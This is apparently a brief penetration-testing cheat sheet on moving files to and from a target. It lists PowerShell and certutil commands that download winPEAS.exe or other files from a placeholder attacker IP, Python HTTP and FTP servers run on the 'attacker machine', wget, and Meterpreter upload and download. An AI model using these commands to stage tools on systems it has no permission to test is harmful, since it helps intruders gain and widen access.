File transfers
Powershell :
Invoke-WebRequest "http://<ip>:8000/winPEAS.exe" -OutFile winPEAS.exeCertutil:
certutil.exe -urlcache -f http://<ip>:<port>/<file.txt> file.txt
HTTP:
python -m SimpleHTTPServer 80
python3 -m http.server
Browser:
Navigate directly to file
FTP:
python -m pyftpdlib 21 (attacker machine)
ftp 10.10.10.10
Linux:
wget http://<ip>/<file>
curl
Meterpreter:
upload <file> / download <file>
Last updated
Was this helpful?